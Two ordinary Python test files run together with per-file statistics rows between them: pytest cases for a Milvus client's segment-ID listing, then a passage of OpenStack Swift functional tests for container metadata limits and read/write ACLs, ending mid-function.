def get_segment_id(connect, collection, nb=1, vec_type='float', index_params=None):
    """Insert ``nb`` generated entities, flush, optionally build an index,
    and return ``(ids, segment_id)`` for the first segment of the first
    partition.

    Args:
        connect: milvus client connection.
        collection: target collection name.
        nb: number of entities to insert.
        vec_type: 'float' or anything else for binary entities.
        index_params: if truthy, an index is created on the matching
            vector field before stats are read.
    """
    if vec_type != "float":
        # The raw vectors are not needed here, only the entities.
        _, entities = gen_binary_entities(nb)
    else:
        entities = gen_entities(nb)
    ids = connect.insert(collection, entities)
    connect.flush([collection])
    if index_params:
        if vec_type == 'float':
            connect.create_index(collection, field_name, index_params)
        else:
            connect.create_index(collection, binary_field_name, index_params)
    stats = connect.get_collection_stats(collection)
    return ids, stats["partitions"][0]["segments"][0]["id"]
class TestListIdInSegmentBase:
    """
    ******************************************************************
    The following cases are used to test `list_id_in_segment` function
    ******************************************************************
    """
    def test_list_id_in_segment_collection_name_None(self, connect, collection):
        '''
        target: get vector ids where collection name is None
        method: call list_id_in_segment with the collection_name: None
        expected: exception raised
        '''
        collection_name = None
        ids, segment_id = get_segment_id(connect, collection)
        with pytest.raises(Exception) as e:
            connect.list_id_in_segment(collection_name, segment_id)

    def test_list_id_in_segment_collection_name_not_existed(self, connect, collection):
        '''
        target: get vector ids where collection name does not exist
        method: call list_id_in_segment with a random collection_name, which is not in db
        expected: status not ok
        '''
        collection_name = gen_unique_str(collection_id)
        ids, segment_id = get_segment_id(connect, collection)
        with pytest.raises(Exception) as e:
            vector_ids = connect.list_id_in_segment(collection_name, segment_id)

    @pytest.fixture(
        scope="function",
        params=gen_invalid_strs()
    )
    def get_collection_name(self, request):
        # Parametrized fixture: yields each invalid collection-name string.
        yield request.param

    def test_list_id_in_segment_collection_name_invalid(self, connect, collection, get_collection_name):
        '''
        target: get vector ids where collection name is invalid
        method: call list_id_in_segment with invalid collection_name
        expected: status not ok
        '''
        collection_name = get_collection_name
        ids, segment_id = get_segment_id(connect, collection)
        with pytest.raises(Exception) as e:
            connect.list_id_in_segment(collection_name, segment_id)

    def test_list_id_in_segment_name_None(self, connect, collection):
        '''
        target: get vector ids where segment name is None
        method: call list_id_in_segment with the name: None
        expected: exception raised
        '''
        ids, segment_id = get_segment_id(connect, collection)
        segment = None
        with pytest.raises(Exception) as e:
            vector_ids = connect.list_id_in_segment(collection, segment)

    def test_list_id_in_segment_name_not_existed(self, connect, collection):
        '''
        target: get vector ids where segment name does not exist
        method: call list_id_in_segment with a random segment name
        expected: status not ok
        '''
        ids, seg_id = get_segment_id(connect, collection)
        # segment = gen_unique_str(collection_id)
        with pytest.raises(Exception) as e:
            # seg_id + 10000 is assumed not to collide with a real segment id
            vector_ids = connect.list_id_in_segment(collection, seg_id + 10000)

    @pytest.mark.level(2)
    def test_list_id_in_segment_without_index_A(self, connect, collection):
        '''
        target: get vector ids when there is no index
        method: call list_id_in_segment and check if the segment contains vectors
        expected: status ok
        '''
        nb = 1
        ids, seg_id = get_segment_id(connect, collection, nb=nb)
        vector_ids = connect.list_id_in_segment(collection, seg_id)
        # vector_ids should match ids
        assert len(vector_ids) == nb
        assert vector_ids[0] == ids[0]

    @pytest.mark.level(2)
    def test_list_id_in_segment_without_index_B(self, connect, collection):
        '''
        target: get vector ids when there is no index but with partition
        method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
        expected: status ok
        '''
        nb = 10
        entities = gen_entities(nb)
        connect.create_partition(collection, tag)
        ids = connect.insert(collection, entities, partition_tag=tag)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        # partition index 1 is the freshly created tagged partition
        assert stats["partitions"][1]["tag"] == tag
        vector_ids = connect.list_id_in_segment(collection, stats["partitions"][1]["segments"][0]["id"])
        # vector_ids should match ids
        assert len(vector_ids) == nb
        for i in range(nb):
            assert vector_ids[i] == ids[i]

    @pytest.fixture(
        scope="function",
        params=gen_simple_index()
    )
    def get_simple_index(self, request, connect):
        # Skip index types the CPU-only build cannot serve.
        if str(connect._cmd("mode")) == "CPU":
            if request.param["index_type"] in index_cpu_not_support():
                pytest.skip("CPU not support index_type: ivf_sq8h")
        return request.param

    @pytest.mark.level(2)
    def test_list_id_in_segment_with_index_A(self, connect, collection, get_simple_index):
        '''
        target: get vector ids when there is index
        method: call list_id_in_segment and check if the segment contains vectors
        expected: status ok
        '''
        ids, seg_id = get_segment_id(connect, collection, nb=nb, index_params=get_simple_index)
        try:
            connect.list_id_in_segment(collection, seg_id)
        except Exception as e:
            assert False, str(e)
        # TODO:

    @pytest.mark.level(2)
    def test_list_id_in_segment_with_index_B(self, connect, collection, get_simple_index):
        '''
        target: get vector ids when there is index and with partition
        method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
        expected: status ok
        '''
        connect.create_partition(collection, tag)
        ids = connect.insert(collection, entities, partition_tag=tag)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        assert stats["partitions"][1]["tag"] == tag
        try:
            connect.list_id_in_segment(collection, stats["partitions"][1]["segments"][0]["id"])
        except Exception as e:
            assert False, str(e)
        # vector_ids should match ids
        # TODO

    @pytest.mark.level(2)
    def test_list_id_in_segment_after_delete_vectors(self, connect, collection):
        '''
        target: get vector ids after vectors are deleted
        method: add vectors and delete a few, call list_id_in_segment
        expected: status ok, vector_ids decreased after vectors deleted
        '''
        nb = 2
        ids, seg_id = get_segment_id(connect, collection, nb=nb)
        delete_ids = [ids[0]]
        status = connect.delete_entity_by_id(collection, delete_ids)
        connect.flush([collection])
        stats = connect.get_collection_stats(collection)
        vector_ids = connect.list_id_in_segment(collection, stats["partitions"][0]["segments"][0]["id"])
        # only the undeleted entity should remain
        assert len(vector_ids) == 1
        assert vector_ids[0] == ids[1]

    @pytest.mark.level(2)
    def test_list_id_in_segment_with_index_ip(self, connect, collection, get_simple_index):
        '''
        target: get vector ids when there is index
        method: call list_id_in_segment and check if the segment contains vectors
        expected: ids returned in ids inserted
        '''
        get_simple_index["metric_type"] = "IP"
        ids, seg_id = get_segment_id(connect, collection, nb=nb, index_params=get_simple_index)
        vector_ids = connect.list_id_in_segment(collection, seg_id)
        # TODO:
        assert vector_ids == ids
class TestListIdInSegmentBinary:
    """
    ******************************************************************
    The following cases are used to test `list_id_in_segment` function
    ******************************************************************
    """
    @pytest.mark.level(2)
    def test_list_id_in_segment_without_index_A(self, connect, binary_collection):
        '''
        target: get vector ids when there is no index
        method: call list_id_in_segment and check if the segment contains vectors
        expected: status ok
        '''
        nb = 10
        vectors, entities = gen_binary_entities(nb)
        ids = connect.insert(binary_collection, entities)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][0]["segments"][0]["id"])
        # vector_ids should match ids
        assert len(vector_ids) == nb
        for i in range(nb):
            assert vector_ids[i] == ids[i]

    @pytest.mark.level(2)
    def test_list_id_in_segment_without_index_B(self, connect, binary_collection):
        '''
        target: get vector ids when there is no index but with partition
        method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
        expected: status ok
        '''
        connect.create_partition(binary_collection, tag)
        nb = 10
        vectors, entities = gen_binary_entities(nb)
        ids = connect.insert(binary_collection, entities, partition_tag=tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        # partition index 1 is the freshly created tagged partition
        vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][1]["segments"][0]["id"])
        # vector_ids should match ids
        assert len(vector_ids) == nb
        for i in range(nb):
            assert vector_ids[i] == ids[i]

    @pytest.fixture(
        scope="function",
        params=gen_binary_index()
    )
    def get_jaccard_index(self, request, connect):
        logging.getLogger().info(request.param)
        # Only index types in binary_support() can use the JACCARD metric.
        if request.param["index_type"] in binary_support():
            request.param["metric_type"] = "JACCARD"
            return request.param
        else:
            pytest.skip("not support")

    def test_list_id_in_segment_with_index_A(self, connect, binary_collection, get_jaccard_index):
        '''
        target: get vector ids when there is index
        method: call list_id_in_segment and check if the segment contains vectors
        expected: status ok
        '''
        ids, seg_id = get_segment_id(connect, binary_collection, nb=nb, index_params=get_jaccard_index, vec_type='binary')
        vector_ids = connect.list_id_in_segment(binary_collection, seg_id)
        # TODO:

    def test_list_id_in_segment_with_index_B(self, connect, binary_collection, get_jaccard_index):
        '''
        target: get vector ids when there is index and with partition
        method: create partition, add vectors to it and call list_id_in_segment, check if the segment contains vectors
        expected: status ok
        '''
        connect.create_partition(binary_collection, tag)
        ids = connect.insert(binary_collection, binary_entities, partition_tag=tag)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        assert stats["partitions"][1]["tag"] == tag
        vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][1]["segments"][0]["id"])
        # vector_ids should match ids
        # TODO

    def test_list_id_in_segment_after_delete_vectors(self, connect, binary_collection, get_jaccard_index):
        '''
        target: get vector ids after vectors are deleted
        method: add vectors and delete a few, call list_id_in_segment
        expected: status ok, vector_ids decreased after vectors deleted
        '''
        nb = 2
        ids, seg_id = get_segment_id(connect, binary_collection, nb=nb, vec_type='binary', index_params=get_jaccard_index)
        delete_ids = [ids[0]]
        status = connect.delete_entity_by_id(binary_collection, delete_ids)
        connect.flush([binary_collection])
        stats = connect.get_collection_stats(binary_collection)
        vector_ids = connect.list_id_in_segment(binary_collection, stats["partitions"][0]["segments"][0]["id"])
        # only the undeleted entity should remain
        assert len(vector_ids) == 1
        assert vector_ids[0] == ids[1]
| 42.333333
| 122
| 0.66119
| 1,697
| 13,208
| 4.867413
| 0.088981
| 0.037046
| 0.049395
| 0.092615
| 0.837651
| 0.797337
| 0.758596
| 0.747821
| 0.724455
| 0.696731
| 0
| 0.007526
| 0.235463
| 13,208
| 311
| 123
| 42.469453
| 0.810458
| 0.242429
| 0
| 0.532609
| 0
| 0
| 0.041077
| 0
| 0
| 0
| 0
| 0.016077
| 0.097826
| 1
| 0.108696
| false
| 0
| 0.043478
| 0
| 0.179348
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86cf34d8d1a6f5beb1470d0cf9e618230e9e71ea
| 68,271
|
py
|
Python
|
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
swift-2.21.0/test/functional/test_container.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
#!/usr/bin/python
# Copyright (c) 2010-2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import unittest2
from uuid import uuid4
from test.functional import check_response, cluster_info, retry, \
requires_acls, load_constraint, requires_policies, SkipTest
import test.functional as tf
from six.moves import range
def setUpModule():
    # Initialize the functional-test environment once for this module.
    tf.setup_package()


def tearDownModule():
    # Tear down whatever setUpModule configured.
    tf.teardown_package()
class TestContainer(unittest2.TestCase):
    def setUp(self):
        """Create a fresh container (self.name) and record the cluster's
        metadata constraints for use by the tests."""
        if tf.skip:
            raise SkipTest
        self.name = uuid4().hex
        # this container isn't created by default, but will be cleaned up
        self.container = uuid4().hex

        def put(url, token, parsed, conn):
            conn.request('PUT', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(put)
        resp.read()
        # If the request was received and processed but the container-server
        # timed out getting the response back to the proxy, or the proxy timed
        # out getting the response back to the client, the next retry will 202
        self.assertIn(resp.status, (201, 202))
        self.max_meta_count = load_constraint('max_meta_count')
        self.max_meta_name_length = load_constraint('max_meta_name_length')
        self.max_meta_overall_size = load_constraint('max_meta_overall_size')
        self.max_meta_value_length = load_constraint('max_meta_value_length')
    def tearDown(self):
        """Empty then delete both containers, tolerating races and retries."""
        if tf.skip:
            raise SkipTest

        def get(url, token, parsed, conn, container):
            conn.request(
                'GET', parsed.path + '/' + container + '?format=json', '',
                {'X-Auth-Token': token})
            return check_response(conn)

        def delete(url, token, parsed, conn, container, obj):
            path = '/'.join([parsed.path, container,
                             obj['name'].encode('utf8')])
            conn.request('DELETE', path, '', {'X-Auth-Token': token})
            return check_response(conn)
        # First pass: delete every object listed in each container until the
        # listing is empty (or the container itself is already gone).
        for container in (self.name, self.container):
            while True:
                resp = retry(get, container)
                body = resp.read()
                if resp.status == 404:
                    break
                self.assertEqual(resp.status // 100, 2, resp.status)
                objs = json.loads(body)
                if not objs:
                    break
                for obj in objs:
                    resp = retry(delete, container, obj)
                    resp.read()
                    # Under load, container listing may not update immediately,
                    # so we may attempt to delete the same object multiple
                    # times. Tolerate the object having already been deleted.
                    self.assertIn(resp.status, (204, 404))

        def delete(url, token, parsed, conn, container):
            conn.request('DELETE', parsed.path + '/' + container, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        # Second pass: delete the now-empty containers themselves.
        for container in (self.name, self.container):
            resp = retry(delete, container)
            resp.read()
            # self.container may not have been created at all, but even if it
            # has, for either container there may be a failure that trips the
            # retry despite the request having been successfully processed.
            self.assertIn(resp.status, (204, 404))
    def test_multi_metadata(self):
        """POSTing separate X-Container-Meta-* headers accumulates metadata
        keys rather than replacing previously set ones."""
        if tf.skip:
            raise SkipTest

        def post(url, token, parsed, conn, name, value):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token, name: value})
            return check_response(conn)

        def head(url, token, parsed, conn):
            conn.request('HEAD', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(post, 'X-Container-Meta-One', '1')
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(head)
        resp.read()
        self.assertIn(resp.status, (200, 204))
        self.assertEqual(resp.getheader('x-container-meta-one'), '1')
        resp = retry(post, 'X-Container-Meta-Two', '2')
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(head)
        resp.read()
        self.assertIn(resp.status, (200, 204))
        # the first key must survive the second POST
        self.assertEqual(resp.getheader('x-container-meta-one'), '1')
        self.assertEqual(resp.getheader('x-container-meta-two'), '2')
    def test_unicode_metadata(self):
        """Container metadata with non-ASCII header names/values round-trips.
        Unicode in the header *name* is only exercised on an 'integral'
        web front end."""
        if tf.skip:
            raise SkipTest

        def post(url, token, parsed, conn, name, value):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token, name: value})
            return check_response(conn)

        def head(url, token, parsed, conn):
            conn.request('HEAD', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        uni_key = u'X-Container-Meta-uni\u0E12'
        uni_value = u'uni\u0E12'
        if (tf.web_front_end == 'integral'):
            resp = retry(post, uni_key, '1')
            resp.read()
            self.assertEqual(resp.status, 204)
            resp = retry(head)
            resp.read()
            self.assertIn(resp.status, (200, 204))
            self.assertEqual(resp.getheader(uni_key.encode('utf-8')), '1')
        resp = retry(post, 'X-Container-Meta-uni', uni_value)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(head)
        resp.read()
        self.assertIn(resp.status, (200, 204))
        self.assertEqual(resp.getheader('X-Container-Meta-uni'),
                         uni_value.encode('utf-8'))
        if (tf.web_front_end == 'integral'):
            resp = retry(post, uni_key, uni_value)
            resp.read()
            self.assertEqual(resp.status, 204)
            resp = retry(head)
            resp.read()
            self.assertIn(resp.status, (200, 204))
            self.assertEqual(resp.getheader(uni_key.encode('utf-8')),
                             uni_value.encode('utf-8'))
def test_PUT_metadata(self):
if tf.skip:
raise SkipTest
def put(url, token, parsed, conn, name, value):
conn.request('PUT', parsed.path + '/' + name, '',
{'X-Auth-Token': token,
'X-Container-Meta-Test': value})
return check_response(conn)
def head(url, token, parsed, conn, name):
conn.request('HEAD', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
def get(url, token, parsed, conn, name):
conn.request('GET', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
def delete(url, token, parsed, conn, name):
conn.request('DELETE', parsed.path + '/' + name, '',
{'X-Auth-Token': token})
return check_response(conn)
name = uuid4().hex
resp = retry(put, name, 'Value')
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(head, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(get, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 204)
name = uuid4().hex
resp = retry(put, name, '')
resp.read()
self.assertEqual(resp.status, 201)
resp = retry(head, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(get, name)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(delete, name)
resp.read()
self.assertEqual(resp.status, 204)
def test_POST_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, value):
conn.request('POST', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token,
'X-Container-Meta-Test': value})
return check_response(conn)
def head(url, token, parsed, conn):
conn.request('HEAD', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
def get(url, token, parsed, conn):
conn.request('GET', parsed.path + '/' + self.name, '',
{'X-Auth-Token': token})
return check_response(conn)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(get)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertIsNone(resp.getheader('x-container-meta-test'))
resp = retry(post, 'Value')
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(head)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
resp = retry(get)
resp.read()
self.assertIn(resp.status, (200, 204))
self.assertEqual(resp.getheader('x-container-meta-test'), 'Value')
    def test_PUT_bad_metadata(self):
        """Exercise metadata limits on container PUT.

        For each limit (name length, value length, item count, aggregate
        size), a request exactly at the limit must succeed and a request
        one unit over must fail with 400 — and the failed PUT must not
        have created the container (subsequent DELETE returns 404).
        """
        if tf.skip:
            raise SkipTest
        def put(url, token, parsed, conn, name, extra_headers):
            headers = {'X-Auth-Token': token}
            headers.update(extra_headers)
            conn.request('PUT', parsed.path + '/' + name, '', headers)
            return check_response(conn)
        def delete(url, token, parsed, conn, name):
            conn.request('DELETE', parsed.path + '/' + name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        # Metadata name exactly at the length limit: accepted.
        name = uuid4().hex
        resp = retry(
            put, name,
            {'X-Container-Meta-' + ('k' * self.max_meta_name_length): 'v'})
        resp.read()
        self.assertIn(resp.status, (201, 202))
        resp = retry(delete, name)
        resp.read()
        self.assertIn(resp.status, (204, 404))
        # Metadata name one character over the limit: rejected, no container.
        name = uuid4().hex
        resp = retry(
            put, name,
            {'X-Container-Meta-' + (
                'k' * (self.max_meta_name_length + 1)): 'v'})
        resp.read()
        self.assertEqual(resp.status, 400)
        resp = retry(delete, name)
        resp.read()
        self.assertEqual(resp.status, 404)
        # Metadata value exactly at the length limit: accepted.
        name = uuid4().hex
        resp = retry(
            put, name,
            {'X-Container-Meta-Too-Long': 'k' * self.max_meta_value_length})
        resp.read()
        self.assertIn(resp.status, (201, 202))
        resp = retry(delete, name)
        resp.read()
        self.assertIn(resp.status, (204, 404))
        # Metadata value one character over the limit: rejected.
        name = uuid4().hex
        resp = retry(
            put, name,
            {'X-Container-Meta-Too-Long': 'k' * (
                self.max_meta_value_length + 1)})
        resp.read()
        self.assertEqual(resp.status, 400)
        resp = retry(delete, name)
        resp.read()
        self.assertEqual(resp.status, 404)
        # Exactly max_meta_count metadata items: accepted.
        name = uuid4().hex
        headers = {}
        for x in range(self.max_meta_count):
            headers['X-Container-Meta-%d' % x] = 'v'
        resp = retry(put, name, headers)
        resp.read()
        self.assertIn(resp.status, (201, 202))
        resp = retry(delete, name)
        resp.read()
        self.assertIn(resp.status, (204, 404))
        # One item over the count limit: rejected.
        name = uuid4().hex
        headers = {}
        for x in range(self.max_meta_count + 1):
            headers['X-Container-Meta-%d' % x] = 'v'
        resp = retry(put, name, headers)
        resp.read()
        self.assertEqual(resp.status, 400)
        resp = retry(delete, name)
        resp.read()
        self.assertEqual(resp.status, 404)
        # Fill metadata up to exactly the aggregate size limit.  Each
        # '%04d'-suffixed header appears to count as 4 (the digits) plus the
        # value length toward the aggregate — TODO confirm against the
        # server's size accounting.
        name = uuid4().hex
        headers = {}
        header_value = 'k' * self.max_meta_value_length
        size = 0
        x = 0
        while size < (self.max_meta_overall_size - 4
                      - self.max_meta_value_length):
            size += 4 + self.max_meta_value_length
            headers['X-Container-Meta-%04d' % x] = header_value
            x += 1
        if self.max_meta_overall_size - size > 1:
            headers['X-Container-Meta-k'] = \
                'v' * (self.max_meta_overall_size - size - 1)
        resp = retry(put, name, headers)
        resp.read()
        self.assertIn(resp.status, (201, 202))
        resp = retry(delete, name)
        resp.read()
        self.assertIn(resp.status, (204, 404))
        # One byte over the aggregate size limit: rejected.
        name = uuid4().hex
        headers['X-Container-Meta-k'] = \
            'v' * (self.max_meta_overall_size - size)
        resp = retry(put, name, headers)
        resp.read()
        self.assertEqual(resp.status, 400)
        resp = retry(delete, name)
        resp.read()
        self.assertEqual(resp.status, 404)
def test_POST_bad_metadata(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('POST', parsed.path + '/' + self.name, '', headers)
return check_response(conn)
resp = retry(
post,
{'X-Container-Meta-' + ('k' * self.max_meta_name_length): 'v'})
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(
post,
{'X-Container-Meta-' + (
'k' * (self.max_meta_name_length + 1)): 'v'})
resp.read()
self.assertEqual(resp.status, 400)
resp = retry(
post,
{'X-Container-Meta-Too-Long': 'k' * self.max_meta_value_length})
resp.read()
self.assertEqual(resp.status, 204)
resp = retry(
post,
{'X-Container-Meta-Too-Long': 'k' * (
self.max_meta_value_length + 1)})
resp.read()
self.assertEqual(resp.status, 400)
def test_POST_bad_metadata2(self):
if tf.skip:
raise SkipTest
def post(url, token, parsed, conn, extra_headers):
headers = {'X-Auth-Token': token}
headers.update(extra_headers)
conn.request('POST', parsed.path + '/' + self.name, '', headers)
return check_response(conn)
headers = {}
for x in range(self.max_meta_count):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 204)
headers = {}
for x in range(self.max_meta_count + 1):
headers['X-Container-Meta-%d' % x] = 'v'
resp = retry(post, headers)
resp.read()
self.assertEqual(resp.status, 400)
    def test_POST_bad_metadata3(self):
        """The aggregate metadata size limit is enforced across POSTs.

        Unlike the count/length limits, the aggregate limit applies to the
        metadata already stored on the container plus what the POST adds.
        """
        if tf.skip:
            raise SkipTest
        if tf.in_process:
            tf.skip_if_no_xattrs()
        def post(url, token, parsed, conn, extra_headers):
            headers = {'X-Auth-Token': token}
            headers.update(extra_headers)
            conn.request('POST', parsed.path + '/' + self.name, '', headers)
            return check_response(conn)
        # Build a header set just under the aggregate size limit.  Each
        # '%04d'-suffixed header appears to contribute 4 (the digits) plus
        # its value length — TODO confirm server-side accounting.
        headers = {}
        header_value = 'k' * self.max_meta_value_length
        size = 0
        x = 0
        while size < (self.max_meta_overall_size - 4
                      - self.max_meta_value_length):
            size += 4 + self.max_meta_value_length
            headers['X-Container-Meta-%04d' % x] = header_value
            x += 1
        if self.max_meta_overall_size - size > 1:
            headers['X-Container-Meta-k'] = \
                'v' * (self.max_meta_overall_size - size - 1)
        resp = retry(post, headers)
        resp.read()
        self.assertEqual(resp.status, 204)
        # this POST includes metadata size that is over limit
        headers['X-Container-Meta-k'] = \
            'x' * (self.max_meta_overall_size - size)
        resp = retry(post, headers)
        resp.read()
        self.assertEqual(resp.status, 400)
        # this POST would be ok and the aggregate backend metadata
        # size is on the border
        headers = {'X-Container-Meta-k':
                   'y' * (self.max_meta_overall_size - size - 1)}
        resp = retry(post, headers)
        resp.read()
        self.assertEqual(resp.status, 204)
        # this last POST would be ok by itself but takes the aggregate
        # backend metadata size over limit
        headers = {'X-Container-Meta-k':
                   'z' * (self.max_meta_overall_size - size)}
        resp = retry(post, headers)
        resp.read()
        self.assertEqual(resp.status, 400)
    def test_public_container(self):
        """X-Container-Read '.r:*,.rlistings' opens the container to
        anonymous (tokenless) GET; clearing it closes access again."""
        if tf.skip:
            raise SkipTest
        def get(url, token, parsed, conn):
            # Anonymous request: deliberately sends no X-Auth-Token.
            conn.request('GET', parsed.path + '/' + self.name)
            return check_response(conn)
        # While private, anonymous GET never succeeds; retry() is expected
        # to give up and raise an error starting with 'No result after '.
        try:
            resp = retry(get)
            raise Exception('Should not have been able to GET')
        except Exception as err:
            self.assertTrue(str(err).startswith('No result after '), err)
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Read': '.r:*,.rlistings'})
            return check_response(conn)
        # Make the container public; anonymous GET must now work.
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        resp = retry(get)
        resp.read()
        self.assertEqual(resp.status, 204)
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token, 'X-Container-Read': ''})
            return check_response(conn)
        # Clear the read ACL; anonymous access must fail again.
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        try:
            resp = retry(get)
            raise Exception('Should not have been able to GET')
        except Exception as err:
            self.assertTrue(str(err).startswith('No result after '), err)
    def test_cross_account_container(self):
        """Container read/write ACLs grant and revoke access for a second
        account (tf.swift_test_perm[1])."""
        if tf.skip or tf.skip2:
            raise SkipTest
        # Obtain the first account's string
        first_account = ['unknown']
        def get1(url, token, parsed, conn):
            # Side effect: capture account 1's storage path for reuse below.
            first_account[0] = parsed.path
            conn.request('HEAD', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get1)
        resp.read()
        # Ensure we can't access the container with the second account
        def get2(url, token, parsed, conn):
            conn.request('GET', first_account[0] + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 403)
        # Make the container accessible by the second account
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Read': tf.swift_test_perm[1],
                          'X-Container-Write': tf.swift_test_perm[1]})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can now use the container with the second account
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Make the container private again
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token, 'X-Container-Read': '',
                          'X-Container-Write': ''})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can't access the container with the second account again
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 403)
    def test_cross_account_public_container(self):
        """A public read ACL ('.r:*,.rlistings') grants a second account
        read but not write; a write ACL is needed for PUTs."""
        if tf.skip or tf.skip2:
            raise SkipTest
        if tf.in_process:
            tf.skip_if_no_xattrs()
        # Obtain the first account's string
        first_account = ['unknown']
        def get1(url, token, parsed, conn):
            # Side effect: capture account 1's storage path for reuse below.
            first_account[0] = parsed.path
            conn.request('HEAD', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get1)
        resp.read()
        # Ensure we can't access the container with the second account
        def get2(url, token, parsed, conn):
            conn.request('GET', first_account[0] + '/' + self.name, '',
                         {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 403)
        # Make the container completely public
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
                          'X-Container-Read': '.r:*,.rlistings'})
            return check_response(conn)
        resp = retry(post)
        resp.read()
        self.assertEqual(resp.status, 204)
        # Ensure we can now read the container with the second account
        resp = retry(get2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 204)
        # But we shouldn't be able to write with the second account
        def put2(url, token, parsed, conn):
            conn.request('PUT', first_account[0] + '/' + self.name + '/object',
                         'test object', {'X-Auth-Token': token})
            return check_response(conn)
        resp = retry(put2, use_account=2)
        resp.read()
        self.assertEqual(resp.status, 403)
        # Now make the container also writable by the second account
        def post(url, token, parsed, conn):
            conn.request('POST', parsed.path + '/' + self.name, '',
                         {'X-Auth-Token': token,
